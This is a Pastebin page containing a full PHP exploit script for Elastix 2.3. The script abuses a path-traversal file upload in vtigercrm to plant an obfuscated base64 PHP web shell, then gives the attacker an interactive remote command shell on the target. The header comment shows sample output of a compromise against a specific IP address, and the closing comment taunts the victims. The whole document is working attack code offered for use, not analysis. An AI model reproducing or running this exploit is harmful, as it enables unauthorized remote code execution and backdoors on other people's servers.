i-Hmx

Elastix 2.3 , Remote Code Injection Exploit

Jan 3rd, 2013
1,385
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.77 KB | None | 0 0
  1. <?
  2. /*
  3. Exploit Title : Elastix 2.3 , Remote Command Execution Exploit
  4. Google Dork : WTF!!!!
  5. Version: Elastix All versions below 2.3 , Newer versions maybe affected as well ;)
  6. Tested on: CentOS
  7. CVE : notyet
  8. Download Vuln software : elastix.org
  9. Author : Faris AKA i-Hmx
  10. Mail : n0p1337@gmail.com
  11. Home : sec4ever.com , 1337s.cc
  12.  
  13. PhoeniX# php elastix.php
  14. +-------------------------------------------+
  15. |               Elastix < 2.4               |
  16. |         PHP Code Injection Exploit        |
  17. |                  By i-Hmx                 |
  18. |                sec4ever.com               |
  19. |             n0p1337@gmail.com             |
  20. +-------------------------------------------+
  21.  
  22. | Enter Target [https://ip] # https://186.149.111.169
  23. | Injecting 1st payload
  24. | Injecting 2nd payload
  25. | Testing total payload
  26. | Sending CMD test package
  27. | sec4ever shell online ;)
  28.  
  29. i-Hmx@186.149.111.169# id
  30. uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
  31.  
  32. i-Hmx@186.149.111.169#
  33.  
  34. */
  35. echo "\n+-------------------------------------------+\n";
  36. echo "|               Elastix < 2.4               |\n";
  37. echo "|         PHP Code Injection Exploit        |\n";
  38. echo "|                  By i-Hmx                 |\n";
  39. echo "|                sec4ever.com               |\n";
  40. echo "|             n0p1337@gmail.com             |\n";
  41. echo "+-------------------------------------------+\n";
  42. echo "\n| Enter Target [https://ip] # ";
  43. $target=trim(fgets(STDIN));
  44. $inj='<?eval(base64_decode("JGY9Zm9wZW4oJ2ZhLnBocCcsJ3crJyk7JGRhdGE9Jzw/IGVjaG8gIkZhcmlzIG9uIHRoZSBtaWMgOkQ8YnI+LS0tLS0tLS0tLS0tLS0tLS0iO0BldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUW2ZhXSkpO2VjaG8gIi0tLS0tLS0tLS0tLS0tLS0tIjsgPz4nO2Z3cml0ZSgkZiwkZGF0YSk7ZWNobyAiZG9uZSI7Cg==")); ?>';
  45. $faf=fopen("fa.txt","w+");
  46. fwrite($faf,$inj);
  47. fclose($faf);
  48. $myf='fa.txt';
  49. $url = $target."/vtigercrm/graph.php?module=../modules/Settings&action=savewordtemplate"; // URL
  50. $reffer = "http://1337s.cc/index.php";
  51. $agent = "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)";
  52. $cookie_file_path = "/";
  53. echo "| Injecting 1st payload\n";
  54. $ch = curl_init();
  55. curl_setopt($ch, CURLOPT_URL, $url);
  56. curl_setopt($ch, CURLOPT_USERAGENT, $agent);
  57. curl_setopt($ch, CURLOPT_POST, 1);
  58. curl_setopt($ch, CURLOPT_POSTFIELDS,array("binFile"=>"@".realpath($myf)));
  59. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  60. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  61. curl_setopt($ch, CURLOPT_REFERER, $reffer);
  62. curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie_file_path);
  63. curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie_file_path);
  64. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  65. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  66. $result = curl_exec($ch);
  67. curl_close($ch);
  68. if(!eregi('<body onload=set_focus()',$result))
  69. {
  70. die("[+] Exploitation Failed\n");
  71. }
  72. echo "| Injecting 2nd payload\n";
  73. function faget($url,$post){
  74. $curl=curl_init();
  75. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  76. curl_setopt($curl,CURLOPT_URL,$url);
  77. curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
  78. curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
  79. curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
  80. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  81. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
  82. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
  83. curl_setopt($curl,CURLOPT_TIMEOUT,20);
  84. curl_setopt($curl, CURLOPT_HEADER, true);
  85. $exec=curl_exec($curl);
  86. curl_close($curl);
  87. return $exec;
  88. }
  89. function kastr($string, $start, $end){
  90.         $string = " ".$string;
  91.         $ini = strpos($string,$start);
  92.         if ($ini == 0) return "";
  93.         $ini += strlen($start);
  94.         $len = strpos($string,$end,$ini) - $ini;
  95.         return substr($string,$ini,$len);
  96. }
  97. $me=faget($target."/vtigercrm/graph.php?module=../test/upload&action=fa.txt%00","");
  98. if(!eregi("done",$me))
  99. {
  100. die("[+] Exploitation Failed\n");
  101. }
  102. echo "| Testing total payload\n";
  103. $total=faget($target."/vtigercrm/fa.php","");
  104. if(!eregi("Faris on the mic :D",$total))
  105. {
  106. die("[+] Exploitation Failed\n");
  107. }
  108. echo "| Sending CMD test package\n";
  109. $cmd=faget($target."/vtigercrm/fa.php","fa=cGFzc3RocnUoJ2VjaG8gZmFyc2F3eScpOw==");
  110. if(!eregi("farsawy",$cmd))
  111. {
  112. echo "   + Cmd couldn't executed but we can evaluate php code\n   + use : $target//vtigercrm/fa.php\n   Post : fa=base64code\n";
  113. }
  114. echo "| sec4ever shell online ;)\n\n";
  115. $host=str_replace('https://','',$target);
  116. while(1){
  117. echo "i-Hmx@$host# ";
  118. $c=trim(fgets(STDIN));
  119. if($c=='exit'){die("[+] Terminating\n");}
  120. $payload=base64_encode("passthru('$c');");
  121. $fuck=faget($target."/vtigercrm/fa.php","fa=$payload");
  122. $done=kastr($fuck,"-----------------","-----------------");
  123. echo "$done\n";
  124. }
  125. /*
  126. /*
  127. NP : Trace my logs very well bit#*z , Next time i will log deeeeeeep in your A$$es ;)
  128.      Enjoy the song : http://www.youtube.com/watch?v=d-ELnDPmI8w
  129.      keep in Your skiddy minds , "I Ain't Mad At Cha"
  130.      < Faris , The Awsome xD >
  131. */
  132. ?>
Add Comment
Please, Sign In to add comment